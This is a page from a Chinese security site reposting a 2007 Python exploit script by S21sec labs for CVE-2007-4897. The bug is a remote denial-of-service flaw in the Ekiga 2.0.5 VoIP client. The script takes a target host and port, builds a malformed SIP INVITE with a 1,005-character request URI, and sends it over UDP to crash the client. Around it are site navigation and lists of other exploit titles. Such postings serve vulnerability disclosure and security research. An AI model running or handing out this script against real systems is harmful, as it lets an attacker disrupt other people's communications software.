首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ekiga 2.0.5 (GetHostAddress) Remote Denial of Service Exploit
来源:S21sec labs 作者:Esparza 发布时间:2009-07-27  

#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs

import sys,socket

if len(sys.argv) != 3:
 sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
     "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
     "Contact:sip:pepe@172.91.1.133:5060\r\n"+\
     "Content-Length:417\r\n"+\
     "Content-Type:application/sdp\r\n"+\
     "CSeq:4321 INVITE\r\n"+\
     "From:sip:pepe@172.91.1.148:5060;tag=a48s\r\n"+\
     "Max-Forwards:70\r\n"+\
         "To:sip:paco@micasa.com\r\n"+\
         "Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\r\n\r\n"  

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenH323 Opal SIP Protocol Rem
·WzdFTPD <= 8.0 Remote Denial o
·The my_gallery version 2.4.1 p
·PHP Live! 3.2.1/2 (x) Remote B
·e107 Plugin my_gallery 2.4.1 r
·Mozilla Firefox 3.5 (Font tags
·WINMOD 1.4 (.lst) Local Stack
·Wordpress 2.8.1 (url) Remote C
·Adobe Flash (Embedded in PDF)
·Scripteen Free Image Hosting S
·Windows x86 null-free bindshel
·MS Internet Explorer 7/8 findT
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved